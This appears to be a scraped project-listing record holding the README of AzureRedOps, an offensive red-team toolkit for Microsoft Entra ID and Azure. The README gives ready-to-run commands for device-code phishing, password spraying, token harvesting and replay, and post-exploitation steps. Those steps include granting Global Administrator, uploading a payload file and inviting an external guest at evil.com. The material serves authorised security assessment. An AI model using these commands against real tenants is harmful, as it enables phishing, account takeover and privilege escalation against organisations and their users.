[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-83129":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":10,"languages":9,"totalLinesOfCode":9,"stars":11,"forks":12,"watchers":13,"openIssues":14,"contributorsCount":14,"subscribersCount":14,"size":14,"stars1d":14,"stars7d":15,"stars30d":15,"stars90d":14,"forks30d":14,"starsTrendScore":16,"compositeScore":17,"rankGlobal":9,"rankLanguage":9,"license":9,"archived":18,"fork":18,"defaultBranch":19,"hasWiki":20,"hasPages":18,"topics":21,"createdAt":9,"pushedAt":9,"updatedAt":22,"readmeContent":23,"aiSummary":24,"trendingCount":14,"starSnapshotCount":14,"syncStatus":25,"lastSyncTime":26,"discoverSource":27},83129,"AzureRedOps","Mr-Un1k0d3r\u002FAzureRedOps","Mr-Un1k0d3r","Azure RedOps is a offensive security toolkit for assessing the security posture of Microsoft Entra ID",null,"Python",149,15,69,0,80,4,68.61,false,"main",true,[],"2026-06-12 04:01:40","# AzureRedOps\n\n> A Swiss Army tool for Azure \u002F Entra ID red teaming.\n\n**Author:** Mr.Un1k0d3r ([TrueCyber Inc](https:\u002F\u002Ftruecyber.world))\n**Version:** 0.1\n**Language:** Python 3.12+\n\n---\n\n## Overview\n\nAzureRedOps is a offensive security toolkit for assessing the security\nposture of **Microsoft Entra ID and Azure** tenants. It wraps the most common\nred-team workflows — authentication, token management, directory enumeration,\nprivilege checking, password spraying, and post-exploitation actions against\n**Microsoft Graph** — behind one consistent `--activity` driven CLI.\n\nEvery operation is selected with `-a\u002F--activity`. Tokens obtained during\nauthentication can be cached locally (`.azure_creds`) and reused by name with\n`-l\u002F--load-access-token`, so you rarely have to paste raw JWTs.\n\n### Features\n\n- **Token management** — save, list, decode\u002Fview, and delete access\u002Frefresh tokens in a local credential store (`.azure_creds`). Any flow can persist its tokens automatically with `-s\u002F--save` + `-n\u002F--name`.\n- **Multiple authentication flows:**\n  - **ROPC** (`auth`) — direct username\u002Fpassword authentication.\n  - **Device-code phishing** (`phish-start` \u002F `phish-capture`) — abuse the OAuth device authorization grant to capture tokens issued when a target enters your user code at `microsoft.com\u002Fdevicelogin`. Auto-captures by default.\n  - **Third-party app consent** (`auth-app`) — full Authorization Code + PKCE flow against a custom application registration, served by a built-in local HTTPS listener that receives the redirect.\n  - **Interactive browser capture** (`auth-interactive`) — drive a real Chromium browser with Playwright (handles MFA \u002F Conditional Access \u002F SSO), then harvest every token from the recorded session HAR.\n  - **Refresh-token exchange** (`refresh`) — trade a refresh token for fresh access tokens.\n- **Directory enumeration** via Microsoft Graph — users, applications, service principals, authorization policies, and a bulk `gather-all` collector.\n- **Password spraying** against known Microsoft first-party app IDs (`spray`) and cross-app refresh-token spraying (`spray-refresh`).\n- **Post-exploitation** — register applications, create groups, assign directory roles, invite external (guest) users, and upload files to OneDrive.\n- **Recon helpers** — `magic-app` finds publicly-redirectable apps with `AllPrincipals` consent; built-in lists of known\u002Finteresting Microsoft app IDs.\n- **Quality-of-life** — beta-endpoint switch, custom headers, custom user-agent\u002Fscope\u002Faudience, attribute filtering, expanded output, debug\u002Fverbose-HTTP logging, and output redirection to a file.\n\n---\n\n## Requirements\n\n- Python **3.12 or newer** (the code relies on PEP 701 f-string syntax).\n- Python packages (see `requirements.txt`):\n  - `PyJWT`\n  - `requests`\n  - `playwright`\n- A browser runtime for Playwright (only needed for the `auth-interactive` activity).\n- TLS certificate + key at `includes\u002Fweb\u002Fcert.pem` and `includes\u002Fweb\u002Fkey.pem`\n  (only needed for the `auth-app` PKCE flow — see [Notes](#notes--tips)).\n\n---\n\n## Installation\n\n```bash\n# Clone the repository\ngit clone \u003Cyour-fork-url> AzureRedOps\ncd AzureRedOps\n\n# Create and activate a virtual environment\npython3 -m venv AzureRedOps\nsource AzureRedOps\u002Fbin\u002Factivate          # Linux \u002F macOS\n# .\\AzureRedOps\\Scripts\\Activate.ps1     # Windows PowerShell\n\n# Install dependencies\npip install -r requirements.txt\n\n# Install the browser used by auth-interactive (one-time)\npython -m playwright install chromium\n```\n\nRun the tool:\n\n```bash\npython3 AzureRedOps.py -a \u003Cactivity> [options]\n```\n\n---\n\n## Usage\n\nThe general invocation pattern is:\n\n```bash\npython3 AzureRedOps.py -a \u003Cactivity> [authentication] [activity options] [global options]\n```\n\n### Providing a token\n\nActivities that call Microsoft Graph need an access token. You can supply it two ways:\n\n| Method | Flag | Example |\n|--------|------|---------|\n| Pass a raw token | `-ac, --access-token` | `-ac eyJ0eXAi...` |\n| Load a cached token by name | `-l, --load-access-token` | `-l mytoken` |\n\nWhen `-l` is used, the matching `access_token` (and, where relevant, `refresh_token`\nand `tenant`) is read from the `.azure_creds` store.\n\n### Saving tokens to a file (`-s` \u002F `-n`)\n\nAny activity that obtains tokens (`auth`, `auth-app`, `auth-interactive`,\n`phish-start`\u002F`phish-capture`, `refresh`) can **automatically persist them** to the\nlocal credential store (`.azure_creds`) by adding `-s\u002F--save` together with\n`-n\u002F--name`:\n\n```bash\n# Authenticate and save the resulting tokens under the name \"victim1\"\npython3 AzureRedOps.py -a auth -u user@contoso.com -p 'P@ssw0rd!' -tid \u003Ctenant-guid> -s -n victim1\n```\n\n- `-s\u002F--save` turns on auto-save; **it requires `-n\u002F--name`** — the tool exits with an\n  error if `-n` is missing.\n- `-n\u002F--name` is the key the token is stored under. You can later reuse it with\n  `-l victim1` instead of pasting the raw JWT, view it with `-a view -n victim1`, or\n  delete it with `-a delete -n victim1`.\n- The `auth-interactive` activity always auto-saves and will prompt you for a name\n  interactively if `-n` is not supplied.\n\n### Saving activity output to a file (`-j`)\n\nMost enumeration activities (`list-users`, `list-applications`, `list-principals`,\n`gather-all`, `raw-url`) accept `-j\u002F--json \u003Cfilename>` to write the raw API response\nto a JSON file instead of (or in addition to) printing it:\n\n```bash\n# Dump every user to users.json\npython3 AzureRedOps.py -a list-users -l victim1 -j users.json\n```\n\nFor `gather-all`, the supplied filename is used as a suffix and one file is written\nper Graph endpoint (e.g. `users-\u003Cname>`, `groups-\u003Cname>`, ...).\n\n> Tip: `-j` controls structured JSON export, while `-re\u002F--redirect-to-file` mirrors\n> the formatted console output to `output.txt`. The two are independent.\n\n### Tenant identifiers\n\n- `-t, --tenant` expects a **domain name** (e.g. `contoso.com`) and is used by the `id` activity.\n- `-tid, --tenant-id` expects a **tenant GUID** or `common`, used by the authentication activities.\n\n---\n\n## Command-Line Options\n\n| Short | Long | Default | Description |\n|-------|------|---------|-------------|\n| `-a` | `--activity` | `id` | **(required)** Activity to perform (see [Activities](#activities)). |\n| `-ac` | `--access-token` | | Azure access token. |\n| `-n` | `--name` | | Name used to save\u002Fload a token, or display name for `register-app`\u002F`new-group`\u002F`invite`. |\n| `-t` | `--tenant` | | Azure tenant **domain** name (used by `id`). |\n| `-c` | `--devicecode` | | Device code (used by `phish-capture`). |\n| `-tid` | `--tenant-id` | | Azure tenant **ID** (GUID) or `common`. |\n| `-app` | `--appid` | `d3590ed6-52b3-4102-aeff-aad2292ab01c` | Application (client) ID. |\n| `-e` | `--endpoint` | `microsoftonline.com` | Login endpoint domain to target. |\n| `-r` | `--refresh-token` | | Authentication refresh token. |\n| `-as` | `--auto-start` | `True` | Automatically start device-code capture after `phish-start`. |\n| `-l` | `--load-access-token` | | Load a cached token by name from `.azure_creds`. |\n| `-j` | `--json` | | Save activity output to the given JSON file. |\n| `-fl` | `--filter` | | Only print attributes whose key matches one of these (comma-separated). |\n| `-u` | `--username` | | User principal name (email). |\n| `-p` | `--password` | | User password. |\n| `-s` | `--save` | `False` | Auto-save obtained tokens to `.azure_creds` (**requires `-n`**). |\n| `-cp` | `--check-privileges` | `False` | After a successful spray login, probe whether users\u002Fapps can be enumerated. |\n| `-uid` | `--uid` | | Azure user object ID (used by `add-group`). |\n| `-headers` | `--headers` | | Extra HTTP headers as JSON, e.g. `{\"X-Foo\": \"bar\"}`. |\n| `-gid` | `--gid` | `62e90394-69f5-4237-91f9-056ad24d70a7` | Directory role \u002F group ID (default = **Global Administrator**). |\n| `-i` | `--id` | `False` | For `interest`: print only the application IDs. |\n| `-ty` | `--type` | | For `interest`: filter to a specific category. |\n| `-fp` | `--filepath` | | File to upload (`push-file`) or custom app list for spraying. |\n| `-v` | `--version` | `v2.0` | Authentication API version: `v0` or `v2.0`. |\n| `-ua` | `--user-agent` | *(Chrome UA string)* | Override the HTTP `User-Agent`. |\n| `-au` | `--audience` | `https:\u002F\u002Fgraph.microsoft.com` | Token audience\u002Fresource. |\n| `-sc` | `--scope` | `openid offline_access` | OAuth2 scope. Use `https:\u002F\u002Fgraph.microsoft.com\u002F.default` for Graph, `openid` for spraying. |\n| `-url` | `--url` | | Target URL for `raw-url`\u002F`invite`; comma-separated list of URLs for `auth-interactive`. |\n| `-beta` | `--beta` | `False` | Use the Microsoft Graph **beta** endpoint for `list-users`\u002F`list-applications`. |\n| `-exp` | `--expand` | `False` | Expand nested lists\u002Fdicts in output to a human-readable format. |\n| `-k` | `--keep` | `False` | Keep the `session.har` file after `auth-interactive`. |\n| `-d` | `--debug` | `False` | Enable debug logging. |\n| `-dd` | `--verbose-debug` | `False` | Enable verbose HTTP request\u002Fresponse logging. |\n| `-re` | `--redirect-to-file` | `False` | Mirror all console output to `output.txt`. |\n\n---\n\n## Activities\n\nBelow, each activity lists its **required** and *optional* arguments.\n\"Token\" means either `-ac` or `-l` is required.\n\n### Token Management\n\n| Activity | Required | Optional | Description |\n|----------|----------|----------|-------------|\n| `save` | `-ac`, `-n` | `-tid`, `-r` | Save an access (and optional refresh) token to `.azure_creds`. |\n| `list-token` | — | — | List the names of all saved tokens. |\n| `view` | `-n` | — | Decode and display the JWT claims of a saved token. |\n| `delete` | `-n` | — | Remove a saved token from the store. |\n\n```bash\n# Save a token under the name \"mytoken\"\npython3 AzureRedOps.py -a save -n mytoken -ac eyJ0eXAi... -r 0.AReAB... -tid \u003Ctenant-guid>\n\n# List, view, delete\npython3 AzureRedOps.py -a list-token\npython3 AzureRedOps.py -a view -n mytoken\npython3 AzureRedOps.py -a delete -n mytoken\n```\n\n### Tenant Discovery & Authentication\n\n| Activity | Required | Optional | Description |\n|----------|----------|----------|-------------|\n| `id` | `-t` | — | Resolve the tenant ID for a given email domain. |\n| `phish-start` | — | `-app`, `-tid`, `-as`, `-s`, `-n` | Begin a device-code flow; prints the user code and (by default) auto-captures. |\n| `phish-capture` | `-c` | `-app`, `-tid`, `-s`, `-n` | Poll for tokens using a previously issued device code. |\n| `auth` | `-u`, `-p`, `-tid`, `-app`, `-v` | `-s`, `-n` | Authenticate with username\u002Fpassword (ROPC). |\n| `auth-app` | `-tid` | `-s`, `-n` | Authorization-Code + PKCE flow via a local HTTPS listener. |\n| `auth-interactive` | — | `-url`, `-k`, `-n` | Spawn a browser (Playwright), let the user log in, and harvest tokens from the session HAR. Always auto-saves. |\n| `refresh` | `-v`, `-app`, and (`-l`) **or** (`-r` + `-tid`) | `-s`, `-n` | Exchange a refresh token for a fresh access token. |\n\n```bash\n# Resolve a tenant ID from a domain\npython3 AzureRedOps.py -a id -t contoso.com\n\n# Device-code phishing (auto-capture is on by default)\npython3 AzureRedOps.py -a phish-start -tid common -app d3590ed6-52b3-4102-aeff-aad2292ab01c\n\n# Capture later with a previously issued device code\npython3 AzureRedOps.py -a phish-capture -c \u003Cdevice-code> -tid common\n\n# Username \u002F password (ROPC)\npython3 AzureRedOps.py -a auth -u user@contoso.com -p 'P@ssw0rd!' -tid \u003Ctenant-guid>\n\n# Interactive browser capture, saving tokens automatically\npython3 AzureRedOps.py -a auth-interactive -url https:\u002F\u002Fportal.azure.com -s -n harvested\n\n# Refresh a saved token\npython3 AzureRedOps.py -a refresh -l mytoken -app d3590ed6-52b3-4102-aeff-aad2292ab01c\n```\n\n#### How the authentication flows work\n\nAzureRedOps implements several distinct ways of obtaining tokens. Pick the one that\nmatches your engagement; all of them honour `-s\u002F-n` for auto-saving the result.\n\n##### Device-code phishing (`phish-start` \u002F `phish-capture`)\n\nThe OAuth 2.0 **device authorization grant** is designed for input-constrained\ndevices, which makes it a powerful phishing primitive: you request a code on behalf of\na first-party Microsoft application, then socially-engineer a target into entering that\ncode at `https:\u002F\u002Fmicrosoft.com\u002Fdevicelogin` while signed into their account. Once they\ndo, the tokens are issued **to you**.\n\n- `phish-start` requests a device code and prints the **user code**, the login URL,\n  and the raw **device code**. Because `-as\u002F--auto-start` defaults to `True`, it then\n  immediately begins polling for the token — so simply running `phish-start` and\n  handing the user code to the target is usually all you need.\n- `phish-capture` is the manual counterpart: feed it a device code you obtained earlier\n  with `-c\u002F--devicecode` and it polls the token endpoint until the victim completes the\n  login (the tool silently retries while authorization is pending).\n- Use `-app\u002F--appid` to impersonate a specific first-party client and `-tid\u002F--tenant-id`\n  to scope to a tenant (`common` by default). Tip: set the scope to\n  `'https:\u002F\u002Fgraph.microsoft.com\u002F.default offline_access openid'` to get a Graph-ready\n  token with a refresh token.\n\n```bash\n# Start a device-code session (auto-captures the token once the victim logs in)\npython3 AzureRedOps.py -a phish-start -tid common -s -n phished\n\n# Or capture against a code you generated separately\npython3 AzureRedOps.py -a phish-capture -c \u003Cdevice-code> -tid common -s -n phished\n```\n\n##### Third-party application consent (`auth-app`)\n\n`auth-app` performs a full **Authorization Code flow with PKCE** against a third-party\n(non-default) application registration. The tool spins up a local **HTTPS listener**\n(`includes\u002FWebserver.py`, on `https:\u002F\u002Flocalhost:2342`) that acts as the OAuth redirect\nURI, generates the PKCE `code_verifier`\u002F`code_challenge` pair, and prints an\nauthorization URL for you to open in a browser. After you consent, Azure redirects the\nauthorization code back to the local listener, which the tool then exchanges for tokens.\n\nThis is the flow to use when you control (or have registered) an application and want to\ndrive consent through a real browser session — useful for illicit-consent style\nscenarios or when ROPC is blocked.\n\n- Requires a TLS certificate\u002Fkey pair at `includes\u002Fweb\u002Fcert.pem` and\n  `includes\u002Fweb\u002Fkey.pem` (see [Notes](#notes--tips) for how to generate them).\n- The default client ID for this flow is `8545b2fc-a69c-4851-9206-0f74a519fe5f`.\n\n```bash\npython3 AzureRedOps.py -a auth-app -tid \u003Ctenant-guid> -s -n consented\n```\n\n##### Interactive browser authentication (`auth-interactive`)\n\n`auth-interactive` launches a **real Chromium browser via Playwright** and lets the\noperator (or a target on a shared session) complete an interactive login — including\nMFA, Conditional Access, and federated\u002FSSO redirects that scripted flows cannot\nsatisfy. The entire browser session is recorded to a HAR file (`session.har`); the tool\nthen parses that capture, extracts **every** access\u002Frefresh token pair seen on the\n`\u002Foauth2\u002Fv2.0\u002Ftoken` endpoint, decodes each JWT, and lets you choose which one(s) to\nsave.\n\n- `-url\u002F--url` sets the page(s) to navigate to after the login page loads. It accepts a\n  **comma-separated list** of URLs (e.g. `https:\u002F\u002Fportal.azure.com,https:\u002F\u002Foutlook.office.com`)\n  so you can collect tokens for multiple resources in one session. Defaults to\n  `https:\u002F\u002Fportal.azure.com`.\n- This activity **always auto-saves**: after harvesting, it prompts for which token\n  index(es) to keep and a name to store them under.\n- Add `-k\u002F--keep` to preserve `session.har` for offline analysis (it is deleted by\n  default).\n\n```bash\n# Log in interactively and harvest tokens for two resources\npython3 AzureRedOps.py -a auth-interactive -url https:\u002F\u002Fportal.azure.com,https:\u002F\u002Foutlook.office.com -k\n```\n\n### Microsoft Graph Operations\n\n| Activity | Required | Optional | Description |\n|----------|----------|----------|-------------|\n| `self` | Token | — | Display the current user's profile (`\u002Fme`). |\n| `email` | Token, `-fl` | — | Search the signed-in user's mailbox for a keyword. |\n| `permission` | Token | — | Show the tenant authorization policy (beta). |\n| `list-users` | Token | `-j`, `-beta`, `-fl`, `-exp` | Enumerate all users. |\n| `list-applications` | Token | `-j`, `-beta`, `-fl`, `-exp` | Enumerate all applications. |\n| `list-principals` | Token | `-j`, `-fl`, `-exp` | Enumerate all service principals. |\n| `register-app` | Token, `-n` | — | Register a new application (with a 1-year client secret). |\n| `new-group` | Token, `-n` | — | Create a new security group. |\n| `add-group` | Token, `-uid` | `-gid` | Assign a directory role to a principal (default role = Global Admin). |\n| `push-file` | Token, `-fp`, `-n` | — | Upload a local file to the user's OneDrive. |\n| `gather-all` | Token | `-j` | Bulk-collect users, groups, apps, SPs, roles, policies, and grants. |\n| `raw-url` | Token, `-url` | `-j`, `-fl`, `-exp` | Issue a raw GET to any Graph\u002FREST URL (handles `@odata.nextLink` paging). |\n| `invite` | Token, `-n` | `-url` | Invite an external (guest) user. `-n` is the invitee's email. |\n| `magic-app` | Token | — | Find apps with `AllPrincipals` consent, `appRoleAssignmentRequired=false`, and public redirect URIs. |\n\n```bash\n# Who am I?\npython3 AzureRedOps.py -a self -l mytoken\n\n# Enumerate users (beta endpoint, save to JSON, only show some fields)\npython3 AzureRedOps.py -a list-users -l mytoken -beta -j users.json -fl displayName,userPrincipalName\n\n# Register an application\npython3 AzureRedOps.py -a register-app -n EvilApp -l mytoken\n\n# Assign Global Admin to a user\npython3 AzureRedOps.py -a add-group -uid \u003Cuser-object-id> -l mytoken\n\n# Upload a file to OneDrive\npython3 AzureRedOps.py -a push-file -fp .\u002Fpayload.docx -n payload.docx -l mytoken\n\n# Query an arbitrary Graph URL\npython3 AzureRedOps.py -a raw-url -url \"https:\u002F\u002Fgraph.microsoft.com\u002Fbeta\u002Fusers\" -l mytoken\n\n# Invite an external user\npython3 AzureRedOps.py -a invite -n attacker@evil.com -url https:\u002F\u002Fexample.com\u002Finvite -l mytoken\n\n# Hunt for exploitable public apps\npython3 AzureRedOps.py -a magic-app -l mytoken\n```\n\n### Password Spraying\n\n| Activity | Required | Optional | Description |\n|----------|----------|----------|-------------|\n| `spray` | `-u`, `-p`, `-tid` | `-fp`, `-cp` | Spray credentials against known first-party app IDs (v0 + v2.0 APIs). |\n| `spray-refresh` | `-v`, and (`-l`) **or** (`-r` + `-tid`) | `-fp`, `-cp` | Replay a refresh token across many app IDs. |\n\nBy default both activities use `includes\u002Fauth_apps.json` as the app source; override\nwith `-fp`. Add `-cp` to test whether each successful login can enumerate users\u002Fapps.\n\n```bash\n# Spray a single credential across first-party apps\npython3 AzureRedOps.py -a spray -u user@contoso.com -p 'P@ssw0rd!' -tid \u003Ctenant-guid> -cp\n\n# Cross-app refresh spraying from a saved token\npython3 AzureRedOps.py -a spray-refresh -l mytoken -v v2.0\n```\n\n### Intelligence & Discovery\n\n| Activity | Required | Optional | Description |\n|----------|----------|----------|-------------|\n| `knownids` | — | `-fl`, `-exp` | List known Microsoft application IDs (`includes\u002Fapps.json`). |\n| `list-interest` | — | — | List the app categories defined in `includes\u002Fauth_apps.json`. |\n| `interest` | — | `-i`, `-ty` | List interesting app IDs; `-i` prints IDs only, `-ty` filters by category. |\n\n```bash\npython3 AzureRedOps.py -a knownids\npython3 AzureRedOps.py -a list-interest\npython3 AzureRedOps.py -a interest -ty all_users\npython3 AzureRedOps.py -a interest -i          # IDs only\n```\n\n---\n\n## Output & Generated Files\n\n| File | Created by | Description |\n|------|-----------|-------------|\n| `.azure_creds` | Token-saving activities | Local JSON cache of access\u002Frefresh tokens, keyed by name. |\n| `output.txt` | `-re` flag | Timestamped mirror of all console output. |\n| `session.har` | `auth-interactive` | Browser session recording (deleted unless `-k` is set). |\n| `\u003Cname>.json` | `-j` flag \u002F `gather-all` | Saved API responses. |\n\n### Bundled data files\n\n| File | Description |\n|------|-------------|\n| `includes\u002Fauth_apps.json` | Target application IDs used for spraying and the `interest` lists. |\n| `includes\u002Fapps.json` | Known Microsoft app IDs and metadata for `knownids`. |\n| `includes\u002FWebserver.py` | Local HTTPS listener implementing the PKCE redirect for `auth-app`. |\n| `includes\u002Fweb\u002Fcert.pem`, `includes\u002Fweb\u002Fkey.pem` | TLS material for the local listener. |\n\n---\n\n## Notes & Tips\n\n- **Default app ID** (`d3590ed6-52b3-4102-aeff-aad2292ab01c`) is the Microsoft Office\n  first-party client, which works for most flows. The hints printed by some activities\n  suggest extending tokens to the **Microsoft Azure CLI** app (`04b07795-8ddb-461a-bbee-02f9e1bf7b46`)\n  for broader access.\n- **Scope guidance:** use `-sc openid` for password spraying and\n  `-sc 'https:\u002F\u002Fgraph.microsoft.com\u002F.default'` for Graph operations.\n- **`--beta`** switches `list-users` \u002F `list-applications` to the Graph beta endpoint,\n  which can surface extra information (e.g. on-prem sync attributes).\n- **`auth-app` TLS:** the local PKCE listener requires a certificate\u002Fkey pair at\n  `includes\u002Fweb\u002Fcert.pem` and `includes\u002Fweb\u002Fkey.pem`. Generate a self-signed pair if\n  they are missing, e.g.:\n  ```bash\n  openssl req -x509 -newkey rsa:2048 -nodes \\\n    -keyout includes\u002Fweb\u002Fkey.pem -out includes\u002Fweb\u002Fcert.pem -days 365 -subj \"\u002FCN=localhost\"\n  ```\n- **Debugging:** `-d` prints high-level debug info; `-dd` dumps full HTTP requests and\n  responses (headers + bodies) — useful when diagnosing failed token exchanges.\n\n---\n\n## Credits\n\nCreated by **Mr.Un1k0d3r** — TrueCyber Inc.\n","AzureRedOps 是一个针对 Microsoft Entra ID 和 Azure 租户进行安全评估的进攻性安全工具包。其核心功能包括多种认证流程（如ROPC、设备代码钓鱼等）、令牌管理、目录枚举、密码喷洒攻击以及后渗透操作，所有这些都通过一个统一的命令行界面实现。该工具使用Python 3.12+编写，支持保存和重用访问令牌，简化了红队活动中的重复性任务。AzureRedOps适用于需要对Azure环境进行全面安全测试与漏洞发现的专业场景，特别是对于那些希望深入了解自身云基础设施潜在弱点的安全团队而言非常有用。",2,"2026-06-11 04:10:12","CREATED_QUERY"]